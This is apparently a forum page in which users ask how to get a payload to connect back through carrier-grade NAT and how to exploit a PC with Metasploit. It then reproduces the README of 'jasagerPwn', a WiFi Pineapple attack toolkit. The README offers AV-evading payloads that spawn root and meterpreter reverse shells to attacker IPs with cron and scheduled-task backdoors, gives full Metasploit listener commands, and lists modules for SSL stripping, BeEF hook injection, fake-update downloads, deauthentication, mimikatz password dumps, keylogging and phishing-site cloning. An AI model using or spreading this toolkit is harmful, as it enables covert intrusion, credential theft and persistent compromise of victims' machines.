  23. Hey guys, I have some issue's regarding my ISP, its set as carrier grade nat and it blocks all incoming port requests, so i was wondering if there is a way around that to obtain public ip address so that my payload can connect back to my system through WAN.If VPN is the only option then are there any free services which support port forwarding?
  24. Is it possible to exploit a pc by Kali Linux without running the exe (file produced by msfvenom) in the victim's pc using metapreter?
  25. Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Nor I nor any associates at Hak5 condone misuse of this code or its features. Responsibility Disclosure: Hak5 has no affiliation with this code base. This code is not reviewed or verified by Hak5; therefore they do not take any responsibility for any of this code and its functionality. If you are paranoid (good!) - then look over the code yourself to be safe. Description This script is intended to increase attack vector consistency and stability by automating the process. For penetration testers, the most important thing is having a stable and well prepared attack vector - because you only get one chance. This script provides exactly that, a way to prepare and automate advanced and complex attack vectors in the lab, and then use them in the field. Compatibility / Troubleshooting Script Requirements: Pineapple [MK4 3.0.0] [MK5 1.0.0] - Debian based Linux. Tested Configuration: Pineapple MK5 1.0.0, Crunchbang Linux | Kali Linux Battery - Pineapple (Router: wlan0 | ICS: wlan1) -> Alfa (DeAuth) Attacker IPs: (2 man red-team) - 172.16.42.2 172.16.42.3 Configuration Picture: Setting up the Script: Open up jasagerPwn in your favorite text editor. Look over all the variables in this file and read my comments; they should clearly explain what is what.Adjust the variables based on your pineapple setup. If anything is unclear, feel free to ask me and I can clarify. After you setup the script, connect to a stable internet connection and run the script - this will prompt you to install dependencies. This will take a few minutes, after that is completed you can connect to the pineapples network (either via wireless or ethernet) and relaunch the script. Thats it. You should be able to use the attack modules. Dependencies Installation: Dependencies will attempt to install automatically if they are not detected on your system, f this fails for you - please look at the src/system_modules/dependencies.sh and just install it yourself. I've tested installation processes on Debian, Crunchbang, and Kali Linux. Infusion dependencies are also required for attack modules. Please refer to the list of attack modules below and their corresponding "Requirements". Included Attack Vector Modules browserPwn - Redirect LAN to Metasloits auxiliary module browser_autopwn. This will be detected by AV. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, DNSSpoof Infusion browserPwn iFrame - Inject an invisible iFrame into the victims browsing session that points to metasploit browser_autopwn. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, Strip-N-Inject Infusion ​BeEf - Inject a BeEf JavaScript hook transparently into victims browsing sessions. This is a form of Man-in-the-browser and will not be detected by AV.​Victim Support: Mac OSX, Windows, Linux Requirements: Strip-N-Inject Infusion Fake Update - Redirect LAN to a realistic fake update page with a [custom] payload download. Victim Support: Mac OSX, Windows. Requirements: Metasploit, DNSSpoof Infusion Click Jacking - Hijack the entire DOM with an injected <div>. No matter where you click, it downloads a payload. Victim Support: Mac OSX, Windows. Requirements: Metasploit, Strip-N-Inject Infusion Java Applet Injection - Transparently injects an OS agnostic java applet into the victims browsing session. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, Strip-N-Inject Infusion Java Applet Redirect - Redirects users to a Java page with an OS agnostic java applet payload. Victim Support: Mac OSX, Windows, Linux. Requirements: Metasploit, DNSSpoof Infusion SSLStrip - Remove SSL from the victims connections and sniff credentials. Victim Support: Mac OSX, Windows, Linux. Requirements: SSLStrip Infusion Aireplay-ng [local] - DoS APs and try to make them join yours via custom aireplay-ng script on the attacker machine. This script will run aireplay-ng against the AP broadcast, note that this works best if you are closer to the AP than the client MDK3 [local] - Deauths nearby clients from their APs and try to make them join yours via MDK3 from the attacker machine. This script will run MDK3 to deauthenticate clients from an AP directly note that this works best if you are close to the clients. As a result, this will have slightly better average range effectiveness. Included Payloads (w/ Source & Documentation) I have included some of my most successful and efficient payloads for your use. One for Mac OSX, and one for Windows - both will completely bypass signature based anti-virus and most behavioral HIPS as well. Apple_MacOSX_Update.pkg Description: This is 4 lines of BASH stuck in an apple postinstall script. No signature AV can ever detect this because it uses system commands and contains no binaries in the package. This will spawn 2 root shells to the following addresses: 172.16.42.2 6446 172.16.42.3 6446 Persistence: It will also add a persistent backdoor that will spawn these 2 every 3 minutes (sudo crontab -l) Metasploit Listener: use exploit/multi/handler set PAYLOAD generic/shell_reverse_tcp set LHOST 0.0.0.0 set LPORT 6446 set ExitOnSession false set AutoRunScript "" exploit -j powershell-https.exe Description: This is an implementation of "Invoke-Shellcode" from Matthew Graeber's PowerSploit modules. It was stripped down then minified and implemented into a standalone python script then compiled into an executable. It is not detect at the time of this writing. If the signature becomes detected, just make a new one. This will spawn 2 meterpreter shells to the following addresses: 172.16.42.2 587 172.16.42.3 587 Persistence: It will also add a persistent backdoor to Windows that will these 2 shells every 3 minutes (schtasks /query /tn winupdate) Metasploit Listener: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_https set LHOST 0.0.0.0 set LPORT 587 set SessionCommunicationTimeout 0 set ExitOnSession false set EXITFUNC process set AutoRunScript "" exploit -j shellcode-tcp.exe Description: This is a windows meterpreter shell that was encoded into base 64, embedded into a python script that preforms basic shellcode execution, and then compiled into an executable. It is not detect at the time of this writing. If the signature becomes detected, just make a new one with some random data in it. This will spawn 2 meterpreter shells to the following addresses: 172.16.42.2 587 172.16.42.3 587 Persistence: It will also add a persistent backdoor to Windows that will these 2 shells every 3 minutes (schtasks /query /tn winupdate) Metasploit Listener: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 587 set ExitOnSession false set EXITFUNC thread set AutoRunScript "migrate -f -k" exploit -j Included Resources I have included a few resources that I find useful on pentests with the pineapple. Metasploit Scripts: These are resource scripts that can be executed from msfconsole or in meterpreter. Creates a nice way to automate post-exploitation at your fingertips. In order to run them use "resource resources/metaspoit_scripts/file_collector.rc". file_collector.rc: Automatically search for documents on the system and download them. enum_app_data.rc: Enumerate passwords and other data from browsers, putty, etc. keylog_recorder.rc: Start a keylogger that will poll and automatically collect keystokes. You can use this then CTRL+Z to background the session. mimikatz.rc: Dump cleartext passwords from memory. Hashses are great, but why deal with cracking when they are sitting in memory in clear text? payload_inject.rc: Inject a meterpreter session into explorer.exe. This is like "duplicate" but you can send it to your red-team and not ever drop a binary on the system. listeners.rc: This is useful for the other members of the red-team not running JasagerPwn. They can just "msfconsole -r listeners.rc" and be ready to receive shells web_clone.sh: This is a simple wget command that I love to use to clone websites for phishing. It will put everything into a single index.html file.Note: If you're preforming a MITM attack then you need to download all the resources that are hot-linked in index.html and then modify them to local, relative paths. This can be tedious but is what I have used to do every template in JasagerPwn airdrop-ng: This was an airdrop-ng attack module that I made before MDK3. I think MDK3 works better so I took it out and plopped it here. Developing Attack Modules This script was created in a modular architecture, allowing for relatively simple expansion of attack vectors. Use the "attack_module_example.sh" located in the resources directory for an example reference. There are just a few requirements when developing the modules: If you're making a local de-authentication module - use "deauth" or "dos" in the description string. You must have a "start_myname" and "stop_myname" function in that format (myname is arbitrary). You must have a unique "title", "description", and "bindings" variables. I recommend editing the src/system_modules/utility.sh - cleanup() function to cleanup after your module. Module Submission: If you develop an attack module that you would like to have added into JasagerPwn, that is great! Just let me know and send me the code. If its a good idea; I'll code review it and add it into the script. Questions / Problems Google Code: https://code.google.com/p/jasagerpwn-reborn/ Bug Submission: https://code.google.com/p/jasagerpwn-reborn/issues/entry Changelog: https://code.google.com/p/jasagerpwn-reborn/source/list Questions: Feel free to ask here or in IRC (irc.hak5.org #pineapple). Download / Update Download via Subversion (sudo apt-get install subversion): svn checkout http://jasagerpwn-reborn.googlecode.com/svn/trunk/ jasagerPwn-Reborn Update Script to Latest Revision: ./jasagerPwn -u Enjoy!
×
×
  • Create New...